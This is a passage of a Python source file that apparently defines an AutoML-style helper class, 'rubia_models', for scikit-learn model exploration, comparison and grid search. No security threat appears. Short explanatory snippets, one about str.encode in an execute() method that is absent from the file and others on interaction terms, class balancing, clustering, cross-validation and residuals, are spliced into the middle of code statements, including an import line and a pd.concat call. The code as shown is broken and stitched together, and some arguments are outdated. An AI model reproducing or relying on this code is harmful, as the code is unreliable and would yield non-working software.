kneighbors_graph\nfrom sklearn.cluster import estimate_bandwidth\nfrom sklearn.cluster import KMeans as kmg, MeanShift as msg, MiniBatchKMeans as mbg\nfrom sklearn.cluster import AgglomerativeClustering as acg, SpectralClustering as scg, AffinityPropagation as apg\nfrom sklearn.cluster import DBSCAN 
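# Note on execute() above: the bare `self.expect.encode("utf-8")` line is a
# no-op -- str.encode returns a new bytes object and leaves the string
# untouched, so the result must be assigned if the byte form is wanted:
expect = "OK"
expect.encode("utf-8")                 # discarded; `expect` is still a str
expect_bytes = expect.encode("utf-8")  # the byte form must be kept explicitly
assert isinstance(expect, str) and isinstance(expect_bytes, bytes)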
as dbg, OPTICS as optg, Birch as big\nfrom sklearn.mixture import GaussianMixture as gmg\n\n\n# multiclass\nfrom sklearn.multiclass import OneVsRestClassifier as ovrc, OneVsOneClassifier as ovoc\n\n# redux\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import SelectKBest, chi2\n\n# pipeline and optimization\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\n\n\nclass rubia_models:\n\n\n def __init__(self, df, width=100, debug=False):\n self.data_raw = df\n self.M = df\n self.report_width = width\n self.graph_width = 1.3 * width // 10\n self.graphs_expl = []\n self.graphs_model = []\n self.debug = debug\n if not self.debug: # remove warnings when not running in debug mode\n import warnings\n warnings.filterwarnings(\"ignore\")\n \n \n # check columns dtype\n def checkDtypes(self, df):\n cols_resume = []\n for col in df.columns:\n coltype = str(df[col].dtype)\n cols_resume.append('%s (%s)' % (col, coltype))\n # beware in the presence of non numeric categorical data\n return cols_resume\n\n \n # show a few general info about the dataset\n def describe(self, df, printt=True):\n self.cols_dtypes = self.checkDtypes(df)\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* DATA OVERVIEW FOR THIS DATASET \\n*')\n print('* DATA SHAPE: ', df.shape)\n print('* COLUMNS INFO: ', ', '.join(self.cols_dtypes))\n print('* ')\n print(self.report_width * '*')\n print('\\nDATA SAMPLE: ')\n print(df.sample(5))\n print('\\nSTATISTICS: ')\n print(df.describe(include='all').T)\n print('\\n\\n')\n return None\n \n\n # run a basic and repetitive EDA for a given pandas dataframe and remove constant columns\n def explore(self, df, y_cols, ig_cols, printt=True, graph=False):\n X_cols = [col for col in df.columns if col not in y_cols and col not in ig_cols]\n self.X = df.loc[:, X_cols]\n self.y = df.loc[:, y_cols]\n for col in self.X.columns:\n if len(self.X[col].unique()) == 1: \n self.X.drop(col, axis=1, inplace=True)\n print('Column removed (constant value):', col)\n for col in self.y.columns:\n if len(self.y[col].unique()) == 1: \n self.y.drop(col, axis=1, inplace=True)\n print('Column removed (constant value):', col)\n self.M = pd.concat([self.X, self.y], axis=1)\n\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* FEATURE EXTRACTION REPORT \\n*')\n print('* X: ', ' | '.join(X_cols))\n print('* y: ', ' | '.join(y_cols))\n print('* M: ', self.X.shape, '|', self.y.shape)\n print('* ')\n print(self.report_width * '*' + '\\n')\n\n if graph: \n self.graphs_expl = [] \n size = self.graph_width\n # balance between every output class: pay special attention with unbalanced data\n unique = []\n for y_col in y_cols:\n unique += list(df[y_col].unique())\n if len(df[y_col].unique()) <= 10:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n df[y_col].value_counts().nlargest(10).plot(kind='bar')\n plt.title('Classes Balance (%s)' % y_col)\n plt.xticks(rotation=45)\n self.graphs_expl.append(fig)\n plt.show()\n # histogram for every feature: pay attention to outliers, data distribution and dimension\n if df.shape[1] <= 20: # for larger datasets, graphs are not recommended\n dfg = df.copy()\n if len(dfg) > 1000: dfg = dfg.sample(1000)\n COLS = 3\n ROWS = len(dfg.columns) // COLS + (1 if len(dfg.columns) % COLS != 0 else 0)\n fig, ax = plt.subplots(ROWS, COLS, figsize=(size, 4 * ROWS))\n row, col = 0, 0\n for i, feature in enumerate(dfg.columns):\n if col == (COLS - 1):\n row += 1\n plt.subplots_adjust(hspace=0.2, top = 0.92)\n else:\n 
plt.subplots_adjust(hspace=0.2, top = 0.80)\n col = i % COLS \n cax = ax[row, col] if ROWS > 1 else ax[col]\n if len(unique) <= 10 and len(y_cols) == 1: # discriminate only one-level and few classes cases\n for cat in dfg[y_cols[0]].unique():\n dfg[dfg[y_cols[0]]==cat][feature].hist(bins=30, alpha=0.5, edgecolor='white', ax=cax).set_title(feature)\n else:\n dfg[feature].hist(bins=30, alpha=0.5, edgecolor='white', ax=cax).set_title(feature)\n fig.suptitle('Data Distribution', fontsize=14)\n self.graphs_expl.append(fig)\n plt.show()\n # pairplot and density plot for every column\n if len(unique) <= 10 and len(y_cols) == 1: # discriminate only one-level and few classes cases\n g = sns.pairplot(dfg, hue=y_cols[0], plot_kws={'alpha':0.5, 's': 20})\n handles = g._legend_data.values()\n labels = g._legend_data.keys()\n g._legend.remove()\n g.fig.legend(handles=handles, labels=labels, loc='lower center', ncol=3)\n else:\n g = sns.pairplot(dfg, plot_kws={'alpha':0.5, 's': 20})\n g.fig.set_figwidth(0.75 * size)\n g.fig.set_figheight(0.75 * size)\n plt.subplots_adjust(top = 0.92, bottom=0.08)\n g.fig.suptitle('Pairplot and Density Matrix', fontsize=14)\n self.graphs_expl.append(g.fig)\n plt.show()\n # correlation heatmap matrix\n fig, ax = plt.subplots(figsize=(0.95 * size, 0.95 * size))\n corr = dfg.corr()\n mask = np.zeros_like(corr)\n mask[np.triu_indices_from(mask)] = True\n sns.heatmap(dfg.corr(), ax=ax, mask=mask, annot = True, vmin = -1, vmax = 1, center = 0, cmap = 'RdBu_r')\n plt.xticks(rotation=45)\n plt.yticks(rotation=45)\n plt.title('Correlation Matrix')\n self.graphs_expl.append(fig)\n plt.show()\n\n return None\n\n\n # add higher level and interaction terms to the model\n def calcTerms(self, df, cols):\n if len(cols) > 1:\n product = df[cols].product(axis=1)\n else:\n product = np.sqrt((df[cols]))\n return product\n def addTerms(self, X, y, levels=2, interaction=True, root=False):\n cols = []\n for col in X.columns: #lets add polynomial terms only for valid data types\n if not str(self.X[col].dtype) == 'object' and not str(self.X[col].dtype) == 'string':\n cols.append(col)\n if levels > 1: #higher level terms makes sense only for k > 1\n #calculating a combination of n elements in groups of k with replacement\n n, k = cols, levels\n if interaction:\n for comb in combinations_with_replacement(n,k):\n comb = list(comb)\n self.X['_'.join(comb)] = self.calcTerms(X, comb)\n # or just the polynomial terms if interaction = False\n else:\n for col in cols:\n for order in range(2, k+1):\n comb = [col for elem in range(1, order+1)]\n self.X['_'.join(comb)] = self.calcTerms(X, comb)\n if root:\n for col in cols:\n comb = [col]\n try: # cannot apply root transform to some data types or data values\n self.X['sqroot_'+col] = self.calcTerms(X, comb)\n except:\n pass\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n \n # encode all non numeric features\n def encode(self, encoder='LabelEncoder', who='both'):\n if encoder == 'LabelEncoder':\n le = LabelEncoder() \n for col in self.X.columns:\n if str(self.X[col].dtype) == 'object' or str(self.X[col].dtype) == 'string':\n self.X[col] = le.fit_transform(self.X[col])\n for col in self.y.columns:\n if str(self.y[col].dtype) == 'object' or str(self.y[col].dtype) == 'string':\n self.y[col] = le.fit_transform(self.y[col])\n else:\n #le = OneHotEncoder() \n for col in self.X.columns:\n if str(self.X[col].dtype) == 'object' or str(self.X[col].dtype) == 'string':\n self.X = pd.concat([self.X, pd.get_dummies(self.X[col], prefix=col, dummy_na=True)], 
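# How addTerms above names its interaction columns:
# combinations_with_replacement(["a", "b"], 2) yields ("a", "a"), ("a", "b"),
# ("b", "b"), which become product columns a_a, a_b, b_b:
from itertools import combinations_with_replacement
import pandas as pd

df = pd.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]})
for comb in combinations_with_replacement(["a", "b"], 2):
    df["_".join(comb)] = df[list(comb)].product(axis=1)
print(df.columns.tolist())   # ['a', 'b', 'a_a', 'a_b', 'b_b']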
axis=1).drop([col], axis=1)\n if who == 'both':\n for col in self.y.columns:\n if str(self.y[col].dtype) == 'object' or str(self.y[col].dtype) == 'string':\n self.y = pd.concat([self.y, pd.get_dummies(self.y[col], prefix=col, dummy_na=True)], axis=1).drop([col], axis=1)\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # auto balance the dataset M \n # only when classes equal or less than 10 classes\n def balance(self, tol, df, y_cols, ig_cols):\n if len(y_cols) == 1:\n y_col = y_cols[0]\n if len(df[y_col].unique()) <= 10:\n size_before = len(df)\n size_smallest = df[y_col].value_counts().min()\n newdf = pd.DataFrame()\n for yclass in df[y_col].unique():\n sample = df.loc[df[y_col]==yclass].sample(size_smallest)\n newdf = pd.concat([newdf, sample], axis=0)\n size_after = len(newdf)\n if (abs(size_after-size_before)/size_before) < tol:\n X_cols = [col for col in newdf.columns if col not in y_cols and col not in ig_cols]\n newdf.reset_index(inplace=True, drop=True)\n self.X = newdf.loc[:, X_cols]\n self.y = newdf.loc[:, y_cols]\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # analyse if this is a regression or classification problem\n # more than 10 classes transforms the process automatically to regression\n def analyse(self, y_cols):\n if len(y_cols) < 1:\n self.strategy = 'clustering'\n else:\n strategy = []\n for y_col in y_cols:\n if len(self.y[y_col].unique()) > 10 or str(self.y[y_col].dtype) == 'float64':\n strategy.append('regression')\n else:\n strategy.append('classification')\n self.strategy = 'regression' if 'regression' in strategy else 'classification'\n # print('Problem identified as', self.strategy)\n return None\n\n\n # dimensionality reduction\n def redux(self, k=10, mode='chi-square', transform='None'):\n if k == 'auto':\n k = 10 # require deeper implementation\n if mode == 'chi-square' and self.X.shape[1] >= k and self.y.shape[1] > 0:\n selector = SelectKBest(chi2, k=k)\n best_features = selector.fit_transform(self.X, self.y)\n mask = selector.get_support(indices=True)\n self.X = self.X.iloc[:,mask]\n elif mode == 'pca' and self.X.shape[1] >= k:\n if transform != 'None':\n scaler = MinMaxScaler() # only minmax supported right now\n self.scalerX_prepca = scaler.fit(self.X)\n scaledX = self.scalerX_prepca.transform(self.X)\n else:\n scaledX = self.X\n self.scalerX_pca = PCA(n_components=k).fit(scaledX)\n X_pca = pd.DataFrame(self.scalerX_pca.transform(scaledX))\n X_pca.columns = ['PC_%d'%(i+1) for i in range(k)]\n self.X = X_pca\n self.M = pd.concat([self.X, self.y], axis=1)\n return None\n\n\n # apply transformation to data\n def transform(self, who, transform, graph=False):\n size = self.graph_width\n if who == 'X':\n if transform == 'None':\n self.scalerX = None \n self.Xt_train = self.X_train\n if len(self.X_test) > 0: self.Xt_test = self.X_test\n if transform == 'Standard' or transform == 'MinMax' or transform == 'Robust':\n if transform == 'Standard':\n self.scalerX = StandardScaler()\n if transform == 'MinMax':\n self.scalerX = MinMaxScaler()\n if transform == 'Robust':\n self.scalerX = RobustScaler()\n self.scalerX.fit(self.X_train)\n self.Xt_train = self.scalerX.transform(self.X_train)\n if len(self.X_test) > 0: self.Xt_test = self.scalerX.transform(self.X_test)\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n if self.Xt_train.shape[1] == 1:\n sns.kdeplot(self.Xt_train[:,0])\n else:\n for i in range(self.Xt_train.shape[1]):\n sns.kdeplot(self.Xt_train[:,i])\n plt.title('X-Features after Transformation (training 
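# balance() above downsamples every class to the size of the smallest one;
# the same idea on a toy frame:
import pandas as pd

df = pd.DataFrame({"y": ["a"] * 6 + ["b"] * 2, "x": range(8)})
smallest = df["y"].value_counts().min()                  # 2
balanced = pd.concat(df[df["y"] == c].sample(smallest)
                     for c in df["y"].unique())
print(balanced["y"].value_counts())                      # a: 2, b: 2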
set)')\n self.graphs_model.append(fig)\n plt.show() \n if who == 'y':\n if transform == 'None':\n self.scalery = None\n self.yt_train = self.y_train \n self.yt_test = self.y_test \n if transform == 'BoxCox':\n # check whether negative/zero values exist\n miny = self.y.min().item()\n # if so, add an offset based on the mean of y to avoid invalid data during the Box-Cox transform\n # using the mean makes the model robust to new and unknown y data\n deslocy = 0 if miny > 0 else (self.y.mean().item() + 1) \n ytransf = self.y_train + deslocy # add offset if necessary\n self.yt_train, lambday = stats.boxcox(ytransf)\n self.scalery = (deslocy, lambday)\n self.yt_test = stats.boxcox(self.y_test + deslocy, lmbda=lambday) \n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n if self.yt_train.shape[1] == 1:\n sns.kdeplot(self.yt_train[:,0])\n else:\n for i in range(self.yt_train.shape[1]):\n sns.kdeplot(self.yt_train[:,i])\n plt.title('y-Features after Transformation (training set)')\n self.graphs_model.append(fig)\n plt.show() \n return None\n \n\n # apply clustering models\n def clustering(self, metric, printt=True, graph=False):\n size = self.graph_width\n X = np.array(self.Xt_train)\n\n # significantly different model setups should be listed as different models\n bandwidth = estimate_bandwidth(X, quantile=0.3)\n connectivity = kneighbors_graph(X, n_neighbors=5, include_self=False)\n # make connectivity symmetric\n connectivity = 0.5 * (connectivity + connectivity.T)\n models = {}\n models[\"KMeans K2\"] = kmg(n_clusters=2)\n models[\"KMeans K5\"] = kmg(n_clusters=5)\n models[\"KMeans K10\"] = kmg(n_clusters=10)\n models[\"Mean Shift\"] = msg(bandwidth=bandwidth, bin_seeding=True)\n models[\"Mini Batch K5\"] = mbg(n_clusters=5)\n models[\"Agglomerative Ward K5\"] = acg(n_clusters=5, linkage='ward', connectivity=connectivity)\n models[\"Agglomerative Avg K5\"] = acg(linkage=\"average\", affinity=\"cityblock\", n_clusters=5, connectivity=connectivity)\n models[\"Spectral K5\"] = scg(n_clusters=5, eigen_solver='arpack', affinity=\"nearest_neighbors\")\n models[\"DBScan Euclidean\"] = dbg(eps=0.5, min_samples=10, metric='euclidean')\n models[\"DBScan Manhattan\"] = dbg(eps=0.5, min_samples=10, metric='manhattan')\n models[\"DBScan Cityblock\"] = dbg(eps=0.5, min_samples=10, metric='cityblock')\n models[\"Optics\"] = optg(min_samples=10, xi=0.05, min_cluster_size=0.1)\n models[\"Affinity Propagation\"] = apg(damping=0.9, preference=-200)\n models[\"Birch K5\"] = big(n_clusters=5)\n models[\"Gaussian Mixture K5\"] = gmg(n_components=5, covariance_type='full')\n \n self.models = models\n\n # for clustering methods, evaluation of the best model is delegated visually to the user\n names = []\n et = []\n results = []\n ROWS, COLS = len(models) // 3 + (1 if len(models) % 3 != 0 else 0), 3\n fig, ax = plt.subplots(figsize=(0.85 * size, ROWS * 0.2 * size))\n fig.suptitle('Clustering Analysis', fontsize=18)\n #plt.figure(figsize=(size, ROWS * 0.2 * size))\n plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.93, wspace=.03, hspace=.20)\n plot_num = 1\n for model_name in models:\n start = time.time()\n models[model_name].fit(X)\n if hasattr(models[model_name], 'labels_'):\n y_pred = models[model_name].labels_.astype(int) # np.int is deprecated; plain int is equivalent\n else:\n y_pred = models[model_name].predict(X)\n if len(np.unique(y_pred)) > 1:\n results.append(silhouette_score(X, y_pred, metric=metric))\n else:\n results.append(0)\n elapsed = (time.time() - start)\n names.append(model_name)\n 
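# A minimal, self-contained sketch of the fit-and-score pattern used in the
# loop above (toy data; 'X_demo' is hypothetical, not part of this class).
# silhouette_score needs at least two distinct labels, which is why the loop
# above guards with len(np.unique(y_pred)) > 1.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

X_demo = np.random.RandomState(0).rand(200, 2)
km = KMeans(n_clusters=3, n_init=10, random_state=0).fit(X_demo)
labels = km.labels_ if hasattr(km, 'labels_') else km.predict(X_demo)
print('silhouette: %.3f' % silhouette_score(X_demo, labels, metric='euclidean'))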
et.append(elapsed)\n plt.subplot(ROWS, COLS, plot_num)\n plt.title(model_name, size=14)\n colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',\n '#f781bf', '#a65628', '#984ea3',\n '#999999', '#e41a1c', '#dede00']),\n int(max(y_pred) + 1))))\n # add gray color for outliers (if any)\n colors = np.append(colors, [\"#bbbbbb\"])\n plt.scatter(X[:, 0], X[:, 1], s=10, color=colors[y_pred])\n plt.xticks(())\n plt.yticks(())\n plt.text(.99, .01, ('%.2fs' % elapsed).lstrip('0'), transform=plt.gca().transAxes, size=14, horizontalalignment='right')\n plot_num += 1\n self.graphs_model.append(fig)\n plt.show() \n\n report = pd.DataFrame({'Model': names, 'Elapsed Time': et, 'Score (silhouette)': results})\n report.sort_values(by='Score (silhouette)', ascending=False, inplace=True)\n report.reset_index(inplace=True, drop=True)\n self.report_performance = report\n \n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* CLUSTERING RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n ax.set_xticks(np.arange(len(report)))\n plt.title('Silhouette Comparison')\n plt.plot(report['Score (silhouette)'])\n ax.set_xticklabels(report.Model)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n\n # apply regression models\n def regression(self, metric, folds=10, alphas=[], printt=True, graph=False):\n size = self.graph_width\n\n # significant model setup differences should be list as different models\n models = {}\n models[\"Linear regressor\"] = lr()\n models[\"Lasso regressor\"] = lassor()\n models[\"Lasso CV regressor\"] = lassocvr()\n models[\"Ridge regressor\"] = rr(alpha=0, normalize=True)\n models[\"Ridge CV regressor\"] = rcvr(alphas = alphas)\n models[\"Elastic net regressor\"] = enr()\n models[\"K nearest neighbors regressor K2u\"] = knnr(n_neighbors=2, weights='uniform')\n models[\"K nearest neighbors regressor K2d\"] = knnr(n_neighbors=2, weights='distance')\n models[\"K nearest neighbors regressor K5\"] = knnr(n_neighbors=5)\n models[\"K nearest neighbors regressor K10\"] = knnr(n_neighbors=10)\n models[\"SGD regressor\"] = sgdr(max_iter=10000, warm_start=True)\n models[\"Decision tree regressor\"] = dtr()\n models[\"Decision tree regressor D3\"] = dtr(max_depth=3)\n models[\"Random forest regressor\"] = rfr()\n models[\"Ada boost regressor\"] = abr()\n models[\"Gradient boost regressor\"] = gbr()\n models[\"Support vector regressor RBF\"] = svr()\n models[\"Support vector regressor Linear\"] = svr('linear')\n models[\"Support vector regressor Poly\"] = svr(kernel='poly')\n self.models = models\n\n kf = KFold(n_splits=folds, shuffle=True)\n results = []\n names = []\n et = []\n for model_name in models:\n start = time.time()\n cv_scores = -1 * cross_val_score(models[model_name], self.Xt_train, self.yt_train, cv=kf, scoring=metric) \n results.append(cv_scores)\n names.append(model_name)\n et.append((time.time() - start))\n report = pd.DataFrame({'Model': names, 'Score': results, 'Elapsed Time': et})\n report['Score (avg)'] = report.Score.apply(lambda x: np.sqrt(x).mean())\n report['Score (std)'] = report.Score.apply(lambda x: np.sqrt(x).std())\n report['Score (VC)'] = 100 * report['Score (std)'] / report['Score (avg)']\n report.sort_values(by='Score (avg)', inplace=True)\n report.drop('Score', axis=1, inplace=True)\n report.reset_index(inplace=True, 
drop=True)\n self.report_performance = report\n \n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* REGRESSION RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Regressor Comparison')\n #ax = fig.add_subplot(111)\n plt.boxplot(results)\n ax.set_xticklabels(names)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n\n # apply classification models\n def classification(self, metric, folds, printt=True, graph=False):\n size = self.graph_width\n\n if len(self.y.iloc[:,0].unique()) > 2:\n struct = 'multiclass'\n else:\n struct = 'binary'\n\n # significant model setup differences should be list as different models\n models = {}\n models[\"Linear discriminant analysis\"] = ldac()\n models[\"Nearest centroid classifier euclidian\"] = ncc(metric='euclidean')\n models[\"Nearest centroid classifier manhattan\"] = ncc(metric='manhattan')\n models[\"K nearest neighbors classifier K2\"] = knnc(n_neighbors=2)\n models[\"K nearest neighbors classifier K5\"] = knnc(n_neighbors=5)\n models[\"K nearest neighbors classifier K10\"] = knnc(n_neighbors=10) \n models[\"Decision tree classifier\"] = dtc()\n models[\"Gaussian naive bayes\"] = gnbc()\n models[\"Bernoulli naive bayes\"] = bnbc(binarize=0.5)\n models[\"Multinomial naive bayes\"] = mnbc()\n models[\"SGD classifier\"] = sgdc(max_iter=10000)\n models[\"Ridge classifier\"] = rc()\n\n if len(self.Xt_train) < 10000:\n models[\"SVM classifier RBF\"] = svc(gamma='scale')\n models[\"SVM classifier Linear\"] = svc(kernel='linear')\n models[\"SVM classifier Poly\"] = svc(kernel='poly')\n\n if self.Xt_train.shape[0] < 10000 or self.Xt_train.shape[1] < 5:\n models[\"Gradient boosting classifier\"] = gbc()\n models[\"Random forest classifier\"] = rfc(n_estimators=100)\n\n if struct == 'multiclass':\n models[\"Logistic classifier multinomial\"] = logitc(multi_class='multinomial', solver='lbfgs')\n models[\"Logistic classifier auto\"] = logitc(multi_class='auto')\n models[\"Logistic One vs Rest\"] = ovrc(logitc())\n models[\"Logistic One vs One\"] = ovoc(logitc())\n\n if struct == 'binary':\n models[\"Logistic classifier\"] = logitc(max_iter=2000)\n\n self.models = models\n\n kf = StratifiedKFold(n_splits=folds, shuffle=True)\n results = []\n names = []\n et = []\n for model_name in models:\n start = time.time()\n cv_scores = cross_val_score(models[model_name], self.Xt_train, self.yt_train, cv=kf, scoring=metric, error_score=np.nan) \n results.append(cv_scores)\n names.append(model_name)\n et.append((time.time() - start))\n #print(model_name, time.time() - start)\n report = pd.DataFrame({'Model': names, 'Score': results, 'Elapsed Time': et})\n report['Score (avg)'] = report.Score.apply(lambda x: x.mean())\n report['Score (std)'] = report.Score.apply(lambda x: x.std())\n report['Score (VC)'] = 100 * report['Score (std)'] / report['Score (avg)']\n report.sort_values(by='Score (avg)', inplace=True, ascending=False)\n report.drop('Score', axis=1, inplace=True)\n report.reset_index(inplace=True, drop=True)\n self.report_performance = report\n\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* CLASSIFICATION RESULTS - BEFORE PARAMETERS BOOSTING \\n*')\n print(self.report_width * '*', '')\n print(report)\n print('\\n')\n\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n 
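# A minimal, self-contained sketch of the stratified k-fold scoring pattern
# used above (toy iris data; every name here is a hypothetical example, not
# part of this class).
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold, cross_val_score

X_demo, y_demo = load_iris(return_X_y=True)
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=0)
scores = cross_val_score(LogisticRegression(max_iter=2000), X_demo, y_demo,
                         cv=skf, scoring='accuracy')
print('accuracy: %.3f +/- %.3f' % (scores.mean(), scores.std()))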
plt.title('Classifier Comparison')\n #ax = fig.add_subplot(111)\n plt.boxplot(results)\n ax.set_xticklabels(names)\n plt.xticks(rotation=45)\n plt.subplots_adjust(hspace=0.0, bottom=0.25)\n self.graphs_model.append(fig)\n plt.show() \n return None\n\n \n # residual analysis for regression problems\n def calc_rss(self, residual):\n return float(((residual) ** 2).sum()) \n def calc_rmse(self, y, y_hat):\n return np.sqrt(mean_squared_error(y_hat, y))\n def calc_r2(self, y, y_hat):\n return r2_score(y_hat, y)\n def residual(self, y, y_hat, model_name, printt=True, graph=False):\n size = self.graph_width\n # do some data conversion because of different methods data types\n sample_size = len(y_hat)\n if isinstance(y, pd.DataFrame): \n y = np.array(y.values.ravel())\n y = y.reshape(-1, 1)\n y_hat = np.array(y_hat).reshape(-1, 1)\n res = y - y_hat\n obs = np.arange(1, sample_size+1).reshape(-1, 1)\n\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* RMSE: %.2f'%self.calc_rmse(y, y_hat))\n print('* R2: %.2f'%self.calc_r2(y, y_hat))\n print('* ')\n print(self.report_width * '*', '\\n')\n\n if graph:\n fig, ax = plt.subplots(2, 2, figsize=(size, 0.5 * size))\n fig.suptitle('Residual Analysis', fontsize=14)\n plt.subplots_adjust(hspace=0.32, wspace=0.2)\n # residual by observation, desired behaviour: stability, stochastic\n ax[0][0].scatter(obs, res, marker='o', c= 'r', alpha=0.8, edgecolors='none')\n ax[0][0].plot(obs, res, c= 'k', lw=0.5, alpha=0.8)\n ax[0][0].plot([0, sample_size], [0, 0], c='k')\n ax[0][0].set_title('Residual', size=14)\n # residual normality, desired behaviour: stochastic and normal distributed residual\n a, result = stats.probplot(res.ravel(), plot=ax[0][1], dist='norm')\n _, p = stats.normaltest(res)\n ax[0][1].text(0.2, 0.8, 'r=%.2f\\np-value=%.4f'%(result[2], p), ha='center', va='center', transform=ax[0][1].transAxes)\n ax[0][1].set_title('Normality (pp-plot)', size=14)\n # residual over leverage, desired behaviour: homoscedastic\n ax[1][0].scatter(y_hat, res, marker='o', c= 'r', alpha=0.8, edgecolors='none')\n ax[1][0].plot([0, y_hat.max()], [0, 0], c='k')\n ax[1][0].set_title('Residual vs Fitted', size=14)\n # residual distribution, desired behaviour: normal distributed residual\n ax[1][1].hist(res, density=True, facecolor='b', alpha=0.5, edgecolor='gray')\n rv = stats.norm(res.mean(), res.std())\n x = np.linspace(res.min(), res.max(), 100) \n h = plt.plot(x, rv.pdf(x), c='b', lw=2)\n ax[1][1].set_title('Residual Histogram', size=14)\n self.graphs_model.append(fig)\n plt.show()\n return 'RMSE: %.2f | R2: %.2f' % (self.calc_rmse(y, y_hat), self.calc_r2(y, y_hat))\n\n\n # evaluate some models\n # metric can be any from one of those:\n # - grid search score metrics for sklearn classifiers\n # - grid search score metrics for sklearn regressors\n # - silhouette score metrics for sklearn clustering\n def evaluate(self, test_size=0.2, transformX='None', transformY='None', folds=10, alphas=[], printt=True, graph=False, metric=''):\n self.graphs_model = []\n if self.strategy == 'regression':\n if metric == '': metric = 'neg_mean_squared_error'\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, shuffle=True)\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.transform('y', transformY, graph) #model transf for y_train\n 
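# A small self-contained sketch of the residual checks computed by residual()
# above, mirroring the calc_rmse/calc_r2 helpers and the stats.normaltest
# call (simulated toy data; names are hypothetical).
import numpy as np
from scipy import stats
from sklearn.metrics import mean_squared_error, r2_score

rng = np.random.RandomState(0)
y_true = rng.normal(loc=10, scale=2, size=50)
y_hat = y_true + rng.normal(scale=0.5, size=50)  # simulated predictions
res = y_true - y_hat
rmse = np.sqrt(mean_squared_error(y_true, y_hat))
r2 = r2_score(y_true, y_hat)
_, p = stats.normaltest(res)  # H0: residuals are normally distributed
print('RMSE %.2f | R2 %.2f | normality p-value %.4f' % (rmse, r2, p))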
self.regression(metric, folds, alphas, printt, graph)\n elif self.strategy == 'classification':\n if metric == '': metric = 'accuracy'\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, shuffle=True, stratify=self.y)\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.transform('y', transformY, graph) #model transf for y_train\n self.classification(metric, folds, printt, graph)\n elif self.strategy == 'clustering':\n if metric == '': metric = 'euclidean'\n self.X_train = self.X\n self.X_test = pd.DataFrame()\n # transform data\n self.transform('X', transformX, graph) #model transf for X_train\n self.clustering(metric, printt, graph)\n return None\n\n\n # given a model, do a grid search for parameters optimization\n def boost(self, model, printt=True, fixed={}): \n\n # n_tests is used to create linspaced values for some grid parameters\n n_tests = 10\n alphas = 10 ** np.linspace(10, -2, n_tests) * 0.5 \n percs = np.linspace(0, 1, n_tests) \n groups = [2, 3, 5, 10]\n pot10 = [1, 10, 100, 1000]\n samples = [5, 10, 30]\n quarts = [0.25, 0.5, 0.75]\n\n params = list(model.get_params().keys())\n grid_params = {}\n\n # use all processors n_jobs=-1 \n # list parameters range for the more common hyper parameters \n if 'n_jobs' in params: grid_params.update({'clf__n_jobs':[-1]})\n if 'shrinkage' in params: grid_params.update({'clf__shrinkage':percs})\n if isinstance(model, sklearn.discriminant_analysis.LinearDiscriminantAnalysis):\n if 'solver' in params: grid_params.update({'clf__solver':['svd','lsqr','eigen']})\n if 'n_neighbors' in params: grid_params.update({'clf__n_neighbors':groups})\n if 'weights' in params: grid_params.update({'clf__weights':['uniform','distance']})\n if isinstance(model, sklearn.neighbors.KNeighborsClassifier):\n if 'metric' in params: grid_params.update({'clf__metric':['euclidean','manhattan','cityblock','minkowski']})\n if 'p' in params: grid_params.update({'clf__p':[1, 2]})\n if 'C' in params: grid_params.update({'clf__C':pot10})\n if 'penalty' in params: grid_params.update({'clf__penalty':['l1','l2','elasticnet','none']})\n if 'multi_class' in params: grid_params.update({'clf__multi_class':['auto','ovr','multinomial']})\n if 'estimator__C' in params: grid_params.update({'clf__C':pot10})\n if 'estimator__penalty' in params: grid_params.update({'clf__penalty':['l1','l2','elasticnet','none']})\n if 'estimator__multi_class' in params: grid_params.update({'clf__multi_class':['auto','ovr','multinomial']})\n if 'kernel' in params: grid_params.update({'clf__kernel':['linear','rbf','sigmoid']})\n if self.strategy == 'classification':\n if 'alpha' in params: grid_params.update({'clf__alphas':alphas})\n if not isinstance(model, sklearn.ensemble.GradientBoostingClassifier):\n if 'loss' in params: grid_params.update({'clf__loss':['hinge','log','modified_huber','squared_hinge','perceptron']})\n if 'criterion' in params: grid_params.update({'clf__criterion':['gini','entropy']})\n if self.strategy == 'regression':\n if 'loss' in params: grid_params.update({'clf__loss':['ls','lad','huber']})\n if 'max_depth' in params: grid_params.update({'clf__max_depth':groups[:-1]})\n if 